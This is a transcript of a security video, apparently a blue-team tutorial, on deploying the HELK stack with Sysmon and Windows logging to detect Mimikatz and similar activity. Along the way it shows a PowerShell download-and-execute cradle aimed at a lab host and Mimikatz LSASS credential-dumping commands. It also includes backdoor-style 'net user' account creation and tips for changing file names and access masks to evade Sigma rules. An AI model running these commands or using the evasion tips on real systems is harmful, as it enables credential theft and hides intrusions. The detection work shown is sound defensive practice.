What's going on YouTube? This is IPSec, and we're going to be changing up a bit this week and doing a video for the blue team, because last week we showed you how to take Mimikatz and have it bypass Defender. So naturally this week we're going to show you how to set up a logging system to detect Mimikatz and oh so much more, just based upon the behaviors of the program. The goal of antivirus is to stop infections before they happen, and it does that by creating that signature file and watching what happens on your disk. Realistically, that's not a great way to stop all hackers. Namely, like insider threats that don't even need programs to do any badness. Having a system that watches the behaviors lets you detect that insider threat. Additionally, it makes sure your network isn't Schrodinger's network, because there's so many companies that just never look for hackers, so they assume they've never been hacked. But once you open Pandora's box, chances are you will find badness. But anyways, if you're on the red team, there's probably going to be tidbits throughout this video that help you stay hidden, and if you know how the blue team is looking for you, you know not to do those things. So let's get into perhaps the most important part of this whole video will be this right here, understanding the basic architecture of what we're building. Because without that, if we run into issues or want to make modifications, we're just SOL. So we're going to be building the HELK stack, which is an ELK stack that is pre-configured for threat hunters. E stands for Elasticsearch. This is the database. L stands for Logstash. This grabs information, enriches it, and puts it into the database. K stands for Kibana. This is a web interface to the database so we can query it. And then ElastaAlert is pretty new. It's going to periodically pull the database for things and then create alerts on them. The whole pre-configured part, the threat hunter part, starts with WinLogBeat. This is software that runs on Windows clients and pulls information out of the event log. It'll send it into Kafka, which is a message broker. Logstash gets information from Kafka, will enrich it, and then put it into Elasticsearch. By enriching, I mean just kind of index it and tell Elasticsearch what each piece of the event log is. And then Kibana, this will have dashboards, ways to search all the event logs. And then Sigma, these are public indicators of compromise. This will search Elasticsearch periodically for just badness, perhaps like dirty words from PowerShell, Mimikatz, IOCs, etc. There's also this KSQL piece, which monitors Kafka and does some fancy things to join event logs together. And then we can just ignore Hadoop, Spark, Jupyter graph frames, because I don't know enough about them to do a video on this. So perhaps that'll be a future thing. With all that being said, let's jump in and start installing HELK. So here we have a relatively fresh copy of Ubuntu Bionic, which is 1804. I've assigned this one CPU, which I probably should have added more CPUs in hindsight, and I've also given it 10 gigs of RAM. You can probably get away with like 5 or 6 gigs of RAM, but I wanted to add more just in case I decide to do more videos on this. It requires 8 gigs for that Jupyter, Hadoop, and all that stuff, so that's why I went above 8. The other thing I wanted to do is show you the commands I've ran. I've just installed 2 packages, that it's OpenVMTools and tmux, and here I was just setting my IP address to a static reservation. So I ran IPADDR, noticed my IP address was some high number. I decided to create a static reservation on my DHCP server. I cleared my reservation on my client and pulled a new IP address. So with all that said, we can now install the HELK stack. So let's open up Firefox and go Google GitHub HELK. And then go to CyberWarDog's repository, copy this, and go back and do a git clone. We need to install git. I need to do that in sudo. And now we can do the git clone operation. And while that clones, I do want to go into the wiki and the installation process. And we go down. I'm just looking for the log that was supposed to tail so we can watch the install process to make sure nothing goes wrong. And now we have HELK installed. So we go into HELK, Docker. I'm going to do sudo./HELK_install. And before I do that, I'm going to do tmux new. So sudo./HELK_install.sh, password. And we're going to be building number 1. We're not doing Spark and Jupyter. The subscription is going to be basic. The IP address, that's going to be pre-configured to whatever your IP is. The UI password is going to be hunting, and we just want to type hunting to validate that. And now it's installing ht-passwd. And I'm going to paste that command I copied from the page, which is the install log, and we can just watch this go. And I'm going to fast forward the video, and we'll resume once everything is installed. Looks like the install is done after about 15 minutes. So I can exit this. And one thing we want to do before we actually get into HELK and start configuring a client is just take a poke around the Docker images to understand what's happening. So we run sudo docker ps to list running containers, and that is ugly. I'm going to pipe that to less with a -S, and that's going to get rid of the line wrapping and put everything on one line so we can easily read it. And we can hit the right arrow to go over, and we want to look at the, let's see, it is the Logstash container, and we'll also want to look at the Elastalert container after that for the Sigma rules. So let's do a sudo docker exec-it, specify the image name, and the command we want to run, which is just bash. And now we are in the Docker container for Logstash. So let's go into the pipeline, and this is all the Logstash rules. Let's just do an ls so that prints better. And it's organized by number, and the earlier numbers get executed first, and the higher numbers get executed last. So the very first thing we have is 0002 Kafka input, and if we look at this, it's just us connecting to the Kafka broker and searching for the topics WinLogBeat, Sysmon-Join, and FileBeat, and then pulling them and sending them through the pipeline. It'll hit things like the Win event Sysmon filter, and we'll see what this one's doing. And that's just a bunch of JSON to organize what the Sysmon is. So it's going to see the Sysmon event ID 2 and going to say that is a file creation event. Event ID 3 is network connect, and 1 is process create. We'll go through all these and dig through them in a little bit. And then near the end, we'll have things like the output, and this is it sending it to, what is it? Elasticsearch. So we're looking at the Win event PowerShell output, and we're saying if the log is Microsoft Windows PowerShell or PowerShell, send it to Elasticsearch, port 9200, and, oh, we don't have a password, it looks like, just using the username Elastic, because I'm guessing Elasticsearch is not listening on a routable IP, so it's just doing network authentication, I guess you could say. So that's all we want to look at for Logstash. The next is Elastalert, which contains all the Sigma rules. So let's just do a docker ps -s again. We need sudo, and then go all the way over and copy HELK-Elastalert and do the same thing. So sudo docker exec-it, the container name bash to enter the container, and then the rules are in opt sigma rules, and we can see 6 or 7 directories where all the rules are stored, and there's application, APTs, Linux, network, proxy, web, and Windows. And let's just start with APT because no one can seem to catch these guys. So let's look at apt cloudhopper.yaml. We can see this rule is looking at Windows Sysmon for event ID 1, which I know to be ProcessCreate, and it's looking for anything with the image of cscript.exe, and it contains .vbs space/shell. So this is probably just something those APTs generally did, and can be considered an indicator of compromise. There are other ones, so we can look at like apt dragonfly, and this one is using the process name crackmap_exec, which is kind of funny. So you can take a look at those rules. We can also go into Windows, which has a bunch of other rules like PowerShell ones, And if we look at PowerShell suspicious download.yaml, we see this is just looking for system.net web client download string or download file. There are things like XOR command line. Let's see what this one's looking at. This is actually Windows Sysmon-Process-Create. Oh, it's looking for a -B XOR. That is organized oddly compared to the other ones I've looked at. So we can go into like Sysmon rules, and there are a bunch of them. Let's look for what is Mimikatz, and we can look at the Sigma rule for detection of LSASS. This is the process that stores all the credentials. So we can see this one is looking for event ID 10, which I don't know what that is. If we Google Windows Sysmon event 10 and go to this is process access. So this is going to be some process is accessing LSASS, and it's asking for the grant access of 1410. We'll probably dig into exactly what this means later in the video. So there were two with Mimikatz. Let's look at in-memory detection. And we can see this one's just looking at a bunch of DLLs loading. I guess event ID 7 is probably like DLL load. So if we look at this event ID, we'll just go back Sysmon Windows event 7. And that is image loaded. So this ultimatewindowsecurity.com is actually a really good site for looking at any Windows event log. So let's see, another one, there is, I think SafetyKeyz. So we can look at Sysmon Ghost Pack SafetyKeyz, and this is a .NET implementation of Mimikatz that does things a little bit safer. And this one is doing event ID 11, which I believe is a file create, and it's looking for the file name tempdebug.bin. So what SafetyKeyz is doing, instead of accessing the LSASS process, it is telling a legitimate Windows process to dump the memory to this location. And that is a bit noisier, so you can't just alert on that. So they decided to alert on the file create of where SafetyKeyz writes files. So if you wanted to start evading these things, you can look at the rules that people use to detect and slightly modify them. So if I was building a copy of SafetyKeyz, I probably wouldn't write to tempdebug.bin. I would probably write to temp.notdebug.bin. So we can get out of all these and then start beginning to configure our Windows client. So this is a pretty vanilla build of Windows. The only things I've really installed was Google Chrome, Notepad++, Sublime, and Git. I didn't want to use the commando install that we did last week because it does a bunch of modifications that may just conflict with the logging we're trying to enable. So the first step is to install Sysmon. And before we install Sysmon, we should make a Sysmon configuration file. And my favorite way of doing that is doing the Sysmon-Modular configs, because the config for Sysmon is ginormous. So if we look at like a example config, it is this. And trying to manage this giant file is a pain. So the modular Sysmon kind of breaks it up into smaller things that you put in directories. So if we wanted to exclude VMware Player, we put that in this directory, and then when it generates, it builds the entire Sysmon config. Super duper handy and would recommend it. So let's copy this, open up a command prompt, and I probably should make this bigger font. So we'll do edit properties, font can be 24, I guess. And then we'll go into documents and do a git clone and paste this Sysmon-Modular thing. And before we can do Sysmon-Modular, we need to install PS Sysmon tools. So let's clone this as well, git clone, PS Sysmon tools, and we'll have to import that project. So if we do a dir, we want to get to this directory, and we can do import module. I think it was import module. Is that what it says to do here? Generate import dash module. Oh, I'm not in PowerShell. Duh. So launch PowerShell and then import dash module. and we should do the PSM1 file. And we can't load it because our execution policy, so let's change that to bypass. And we have to open command prompt in administrator mode. So I'm going to press Control-Shift-Enter. That prompts the UAC dialog. And then we can go back to users IPsec documents, launch PowerShell, and do a dir, go into PS Sysmon tools, and we can import that module again. There we go. And I have to set the execution policy, deja vu. And this time the command will finally work. And we can go into the Sysmon-Modular, and then we just execute the generate Sysmon config, and it's going to back up the config and generate a new configuration. If we do a dir, we can see the backed up config, and then we got a new one. So now we have to go download Sysmon. So I can just search download Sysmon, and it will be on Microsoft's website. And installing Sysmon, super easy. You just pretty much specify Sysmon-I, I believe. So we can minimize that. Copy this to, I guess, the desktop. I'm going to move this into the documents, Sysmon-Modular, and then we'll install it there. So we just do Sysmon, and we can do -H first. And we see all the flags. We want to do -I to install the service and driver. So we'll do Sysmon-I, and then the config. So Sysmon config.xml. We'll accept the EULA, and now we have successfully installed Sysmon. So if we look at our services, maybe I need services.msc. There we go. We should have a Sysmon here, Sysmon64, and it's set to automatic, so it'll start up the next time we reboot the box as well. So that's done. But there's also a bunch of other logging that we want to do, such as command line logging, PowerShell script logging, task event logging, just all the logs. So I'm going to open up a MMC console, and then I'm going to press Control-M to open up the add remove snap-ins. I'm going to type GP to get to group policy object, Alt-A to add it, enter, enter, and now we're in this. And this is very much like group policy. We could manually enable this through the registry, but this way, if you're trying to deploy it on a lot of computers, it'll be pretty much the same. You should be familiar with this interface. So the first thing I want to do is enable the command line logging, and that is under, I believe, Windows, Security Settings, and then Advanced Audit Policy Configuration, System Audit Policies, and Detail Tracking. There we go. We got to enable the process creation. And then there is also one to enable these advanced policies, and that one is under, I think, local policies, security options, and then audit. Force audit policy subcategory. This is what I want to do. If you have questions, you can just read the explanation. Microsoft's pretty good at documenting these things, but that's going to enable these advanced audits. And then we also have to enable the detail tracking, or actually the verbose, because right here, we just enabled the process creation. So that one is under administrative templates, and then Windows components. No, I think this one is system, and then audit process creation. There it is. And we can enable this. And now this will have command line logging enabled. So if we did a command like, let's actually exit PowerShell, so it's not captured in PowerShell logging, but we'll do the command net user hacker I love comments /add, and we can also then delete this user. So this should show up in our logs. So when we install WinLogBeat, hopefully we'll be able to see this inside of our ELK stack. So the last thing we want to do is, well, second to last, we probably want to enable PowerShell logging. And that one is under Administrative Templates, Windows Components, and then Windows PowerShell. Or is it? Here we go. And we want to turn on modular logging. And the module name, we'll do all the modules. So we'll just put a star. And then we can do script block logging, enable this. And let's, for the heck of it, log start and stop events. Script execution. This is the bypass thing, so we don't need to touch that. PowerShell transaction. If we enable this and put a directory, it'll write the PowerShell scripts to that directory. I believe this is what Commando does. If you notice when you run PowerShell, it creates a directory on your desktop and shows you all the PowerShell you ran. So since we're logging in event log, I'm not going to enable that. And then for this, we should also add some things to our PS home variable. So that is in C:\Windows System 32, Windows PowerShell v1.0. And if we create the file profile.ps1, that should execute anytime we open PowerShell. And I can only create folders because of UAC. So let's just create something to the desktop. So we just want a PowerShell file to set log command health event to true. And we also want to do log command life cycle event equals true. And you can just Google these things to figure out what they are. Essentially, the first one is going to enable like logging of errors. And I forget what this one does. Let's just Google this. This one specifically logs the starting and stopping of commands. So create these two, and we can verify that they will actually work by loading PowerShell here. And we can do echo this. Oh, we just have to paste that. And we see nothing is there. Let us save this to the desktop as profile.ps1 and then copy it into that folder. So we saved it. And let's move it into here. Continue. And now when I do PowerShell and the same command, we see it as true. So now we know that is set up. And the final thing we want to do is enable the task scheduler logging. So I'm going to open this up, and then I'm just going to click this to enable all task history. I'm not sure how to set this in group policy. If you Google it, there are PowerShell commands or Windows commands to set it. So yeah, that should handle all our logging. And now we can install the WinLogBeat. So let's search for WinLogBeat. And we want to download it. And installation steps, where is the download? 64-bit. So we can open this. And then copy it to our desktop. And then go from a command prompt to a desktop. Do a dir WinLogBeat. And we probably want to edit the configuration file real quick. So let's do open, desktop, WinLogBeat, WinLogBeat.yaml. And then we want to, this is not it. Oh, there's probably a WinLogBeat file on the repo for HELK. So we'll do HELK GitHub, go to CyberWarDog, and then let's see, here's WinLogBeat, WinLogBeat.yaml, and let's copy this file. So Control-C to copy, go to Notepad, paste it, save, and we need to set our HELK IP, and I believe I was 172.16.10.10. Save that. And it says if you only have one Kafka instance, which is the default for HELK, remove the second one, which is why I removed that. So X out of that. Let's go back to a command prompt, and we want to go in a PowerShell and install service WinLogBeat. And we can go into the services. That's not it. Services.msc. And look at WinLogBeat. We see it's automatic but not started. So I'm going to hit enter and click start to start the service. And we should be getting information inside of HELK now. But because this is Windows, I am going to reboot it to make sure we get all the information, because I'm not sure if all that like command line logging actually took effect now or does it at next reboot. So to be safe, I'm just going to reboot. Windows just finished rebooting, so I'm going to open up services, make sure everything is started, and then we'll take a look at Elasticsearch. So if we search for Sysmon, that is running, and then WinLogBeat, and that is running as well. So let us open up Chrome so we can look at the HELK stack. So go to 172.16.10.10, and then accept the privacy warning. And then the password was, forget what the password was. It's, let's see. Let's go HELK GitHub. I know that the password was hunting. I don't know the user. So search for hunting. Let's go to install. That's not installation. Hunting. So let's see. UI password is hunting. What is the username? Is it hunting? Refresh. Hunting. HELK hunting. Okay. Username is HELK. Password is hunting. And this is the, I guess, homepage of Kibana. We could go to dashboards and look at Sysmon dashboard to see if there's information. And if there's information in this, then we did a good job. We have 369 Sysmon events. These things aren't working. I'm not sure what those are, but we can see bunches and bunches of things. So let's go over to the Discover, and we're going to change our search for, let's do security. I think this is where the command line logging is, and we can look for net user. And let's see. That grabbed for user or net user, but here we can see the actual commands, and we can see the event ID is 4688. So let me make this font bigger first. So that should be better. But event ID is 4688. So I can look at event. Let's go options, turn on query features. So we can do event ID, and then equals a value, which is a colon, and then put 4688. That should have worked. Maybe it's not in quotes. Nope, maybe we don't do the comma. And I think, yep, this searched only for 4688. So if we look at one of these events, we can look that it's a process create, and here's the command line. So let's do process name. We'll put this in the column table, and then process command line we're also interested in. And then if we go up here and minimize that role, we can see what every process is doing. And if we go all the way back, we should be able to find a process with net user. Let's see. Let's just search these. So here's me launching Notepad++, speech runtime, net1.exe, and here we go. We have net1 user hacker /delete, and we also have us creating the user with net user hacker I love comments /add. So this is why like having logging is beneficial. We could also just, let's go back to our HELK instance and host a file. So dev shm, and we'll do v attack. And we'll call this owned is equal to true. And then we'll do python-m simple HTTP server. We need Python 3, so Python 3-m HTTP server. And then we can go back to our Windows and go into PowerShell. And I'm going to go in command prompt to make the font bigger than PowerShell. And I'm going to do IEX new object net.webclient download string HTTP 172.16.10.10:8000/attack. And let's see, is true. I did that wrong. Let's do owned is equal to true, like that maybe. We'll put LOL. Host that again, and let's run this. There we go. So if we look in PowerShell logging, so we can look at logging PowerShell, and we're not getting any. Oh, because we have event ID 4688. Refresh. Probably none from that time, so we can set the time to be quick, and we'll do today. And we want to get rid of process name and process command line. And here we have all the PowerShell logging. So we can see right here at this event, we have the PowerShell logging saying invoke expression and setting the value of owned to true. And this is that error message. So a little bit after that, you probably have the LOL in that setting a variable. So we can just, let's look at this to toggle column and table, and then minimize this, and we can just see all the PowerShell things. So there is us running owned is equal to LOL, and this is the error message that the true generated earlier. And you can see us installing WinLogBeat. So super handy logging. So now let's do something with Mimikatz. So before I do this, let us set Defender to ignore stuff in our documents because I don't want it to flag on the actual source. So let's see. We're going to pretend that we have bypassed Defender. And I was hoping to do this video when we had a copy of Mimikatz that ignored it, but I didn't feel like creating another one because 24 hours after creating it and posting the video, Microsoft flagged the copy I did, and I'm lazy to change the strings again. If you want to create a Mimikatz that bypasses Defender, check out the video, or just turn Defender off. So let's go open up. I don't need to open up Chrome. I know where Mimikatz is stored. I'm a professional. I've done this before. So git clone https github.com gentle kiwi Mimikatz. And then we want to go into Mimikatz. Let's do this through this. I think this is in UAC. I'm not positive, but to be sure, let's go in Mimikatz. Nope. It's not built for us. Darn it. Let's go to IE. Because if I go Chrome, Chrome doesn't like us downloading Mimikatz because it says it's a virus. So github.com gentle kiwi Mimikatz. And then we want to go to releases and then download it. So download the .zip, open, and x64. I closed it, so the temp directory exited. That is annoying. Mimikatz, releases, zip, open, x64, don't close it, minimize it, and then copy this to the desktop. So now we can just launch Mimikatz, run as administrator, And yes. And then we can go into Chrome. I shouldn't keep closing Windows. I'm trying to not have 100 things open, and it's definitely backfiring. But let's go back to our Kibana. HELK, hunting, and we want to go to Discover, and we'll do Sysmon. What? I disabled you. Clear history. And of course, I closed IE. See, this is why I had the plans to make this all undetectable. Real-time protection's off. Let's just set a exclusion, add exclusion, folder, C:users, IPsec, select that folder. Let's see, do we still have Mimikatz? We do not. Oh, no, we do. It's just underneath this window. Nope, it's gone. Okay, so let's do this one last time now that Defender should be excluding everything. So download Mimikatz, the zip, open, x64, I closed IE. This is going to be the time it works. Releases, source code, open, minimize. And that is not it. Source, x64, copy Mimikatz to the desktop, and then let's run this with UAC. And then we can do privilege debug, secure LSA, log on passwords, and then look in HELK at Sysmon events that have Mimikatz in it. Because we know the executable name, this will just help us filter out to only events with Mimikatz, and we can see what it's doing. So let's look at event IDs. So I can just click add here, and it's going to show all the event IDs. So we want 10. This was one of the Sigma rules. So this is doing a access process. Where is target process? Here we go. Process target path LSASS. And the grant, where is grant? Let's search. Granted access 1010. And before they said like 4010 or something. So that Sigma rule appears to be off. And if we wanted to, we could just do, let's do event ID is 10 and target process, I thought it was target process name. Why didn't that not show up? Where's LSASS? LSASS process target name. So, and process target name is LSASS.EXE. Let's see if this works. So if we add process target name to a table, we can see everything that is talking to LSASS. And if we add the granted access, this will add all the numbers. So we can see 1010, 1000, 1000, 1000, 1000, 1410. So if we want, we can search for process granted access. I copy that. Is equal to 0x1010. And only Mimikatz has that one. So this definitely does stick out. So what we can do is look at Mimikatz to see exactly why it did that. So let's open up Sublime. Do File, Open Folder, Mimikatz, select folder. Let's go into Mimikatz, Modules, Secure LSA, and let's see, it's probably SecuriLSA.C. And I think the function name is like LSA acquire, acquire LSA. So here we have the code that Mimikatz uses to access LSASS. And the first thing we're doing is assigning the process rights and giving ourselves process VM read. And if Mimikatz major version is less than 6, we're doing process query information. Otherwise, we're doing process query limited information. So my guess is maybe this is for like MimiLove or something that's old, and process query limited information is a new call in like Windows 7 or 10. So, or maybe even XP added it. But I'm guessing that's a relatively new call, and we're seeing like backwards compatibility right here. And then after it does that, we can look at what it does with process rights. We're creating a handle to open the process LSASS.EXE with it. So if we want to, we can look at exactly how it gets to 0x1010. So let's look at process VM read. If we open this, Google this, and then search process query information, and go to the Microsoft page, and it's going to describe everything and also give us the hex. So process limited information is 0x1000. And then the next one we want is, let's go back. It is process VM read, and that is 0x10. So it does a bitwise XOR operation, not XOR, OR operation, which comes out to 0x1010. So that is why we're seeing that inside of Kibana. So if you wanted to, you could probably modify some of this or just add a random handle, and that may fool like an EDR solution if it's just looking for 0x1010. Oddly enough, let's see what the Sigma rule was, because that Sigma rule was not 1010. So we'll do Sigma rules, Mimikatz, LSASS, and let's see what this detects. So this is saying 0x1410. So if we look, so we did query information. So this was 1000, limited information. So query information. Let's see what this is. Go back here. This is 400. So instead of limited, this is limited. This is VM read, and this is all. So I'm not sure if this Sigma will really detect anything, because maybe it was an old version of Mimikatz that did both query information and limited information, because all three of these equal 1410. I would assume on like MimiLove or on an old distro, it would be 0x410, because you don't have this limited call. So maybe I'm misreading how that Sigma rule works, but that one may actually be broken. We want to, I guess we can just show one last thing. Let's play with the command line logging. So let's go back here to, it was under system. We can take away all our searches. And what are we looking at? Oh, because we're probably in a very short time frame. So let's, where is the time? Click this, click quick. We'll do today. And we can probably just search for, let's just do, was it /add? Net1. It's security we actually want. So I want to do event ID 4688. So we can do event ID 4688. It's not a comma. And let's get rid of these columns. And we want to add the, I guess, process parent path. Oh, there's parent name. Let's do that one. That'd be less text. Name. There is... Easy if we just expand this. So we want command line, and we also want process name, and we want command line. So now if we minimize this, we have the parent name, the process name, and the command line. We can do auto refresh, 5 seconds, and sort time. So it looks like it's already newest first. And we can set this to be last 15 minutes. I thought we'd get rid of some noise. We can set this to be last 5 minutes. Still has a bunch of things, but let's open a command prompt and then do find dot bad stuff. This is going to be a syntax error, net user, IPSec, and then we can do please subscribe /add. Passwords longer than 14. Sure. Access denied because we're not in UAC. So let's do a UAC window and do net user IPSec, please subscribe. And I think that's my current username, so maybe I don't need /add. I do not. So we can already see the commands showing up as Explorer launched cmd.exe. Let's see, we can turn auto refresh off. But let's see, probably just grab this window. So Explorer launches cmd.exe, then cmd does conhost, then we'll probably do Explorer again. Here's consent, this is the UAC. So we're giving ourselves a elevated prompt, and then running command, and then doing another net user that fails. And here we'd have me changing the password for IPSec to please subscribe. So really handy to have this type of thing in your environment. We can also look at like dashboard, Sysmon dashboard, and see what's here. We have Mimikatz, browser, Sysmon file name. I'll have to find out what these are and why that's not working. We can see registry information, hashes of process names, and then the discover thing to see what's going on in a system. Dashboard is nice, but I really like just having the discovery tab and then exploring for things. Like the Elastalert alerts, which we have not done yet. So let's go to the Elastalert status index, get rid of this event ID query, and we're going to submit it for today. And we're going to go to some of the earlier alerts to see exactly what's so noisy right here. So let's get rid of all our filters, or whatever these are called, and let's add some new ones. So let's expand this one, and let's add, let's see, does it say? This field, the rule name. So we'll toggle this column, and then we can see Rails service installs is going off constantly. So this is where the understanding the architecture is really going to help. So let's also add this column. And we can see it just keeps on flagging for this, like constantly. So let's go and check out the rule for rare service install. Going to the HELK stack, let's do sudo docker ps, put my password, and do less-S. We want to go into the HELK-Elastalert, and then we can do sudo docker exec it bash. So the modules do have a debug thing, so, but before I do that, let's do a quick Google. Spectre ops Elastalert HELK. Maybe this will pull up the post I'm thinking about. I believe, yes. This post explains a lot. So I'd recommend reading it, but I'm going to go over the basics. We already know that Sigma rules are created in this directory. And what a Sigma rule looks like, let's do find op Sigma rules grep service. And we can cat this rare service install.yaml. And we can see it's doing event ID 7045, 7 days. And if that service is less than 5, display an alert. So this is really cool because it would also flag on like a single box being PS exec'd into. So if a single service for 7 days is installed on less than 5 systems, that's what the alert is. But that doesn't translate into ELK. So if we go to home/rules, we have what the auto conversion process does to these rules. So if we do ls grep on service or serve, we can cat sigma win malicious service install, or not malicious, we want rare service install. So cat this, we can see the buffer time is 7 days. We got this query. The minimum threshold is 5. So everything looks good until we get to this re-alert thing. This is the silence. So since this is set to 0 days, it's never going to silence this alert and going to keep on playing the alert. So if you wanted to, you could do, go back to the home where you have config.yaml and you do python-m elastalert.elastalert. And this should say like the usage instructions. There we go. You have to add -h. So we can do --verbose, or we could even do debug --rule. And we have to get that rule name. So let's just do find.grep rare grep sir. Grab this rule name. I should copy this first. And then paste the rule. And that should be it. So it's going to run again. It sees no alert sent, but that was the very first run. It's going to run again and do the time delta from this run and the next run and tell us if that thing ever triggers. So let's see what happens. It's going to wait 30 seconds, so probably another 15 seconds. I'll speed up the video. And it doesn't look like it saw anything. I'm going to let it hit one more time, and then we're going to do it again, but change the time. Yeah, it's not finding anything. That's odd. So let's do --start. That t, the time, we'll do 0000, and try this. And what is my rule? Sigma Windows rare service install. Going back to this. Rare service installs. There we go. So I'm not sure exactly why I needed that start thing, but we can see it did trigger. Oh, because it probably has to see the install. So it had to start before we installed this service. So we see the alert triggers, and we keep getting these alerts, one for each thing. Sysmon64, Sysmon driver, and cmd.exe. And we got the alert again. So if we edit this alert file, if we go into rules, can I do a V? Yeah, there we go. Rules, and change this re-alert to be, let's say, what the buffer is, 7 days. We could even set 1 on both if we wanted to. And now we run this alert again. We see it's got hits, and we're going to wait 30 seconds, and it should tell us that all these are silenced, so it's not sending a message. And there we go. And it's ignoring match for silenced rule. And that's it. So if we were to let this run again, it'll ignore the match yet again. And then we will create a service and let this flag it. So there we go. You see everything is silenced between these two. Let's go back to our Windows box. And I think it's, let's see, CMD. I think it's SC create service. Please sub bin. Is it binary path or bin path? Let's see. SC create service name. So please subscribe. Bin path is equal to C: Windows System 32 Notepad.exe. We have created the service please subscribe. If we go into services.msc, we should have a please subscribe service right there. So let's go back into our HELK where our debug is and see if this runs and finds please subscribe. There we go. And we have role name, rare service install, bin path notepad, and it is adding it. So that is how you play with these alerts and fix them to get your Sigma alert panel less noisy. So if we go back and we can just do relative last 15 minutes, we don't see any of that spam that we had saw before, because if you look way early in the day, you should see this thing going off like every minute, more than that. Like, so 1932 here, 1932 down here. It was just spamming our alerts. So, yep, hope you guys enjoyed the video. Take care, and I will see you all next week.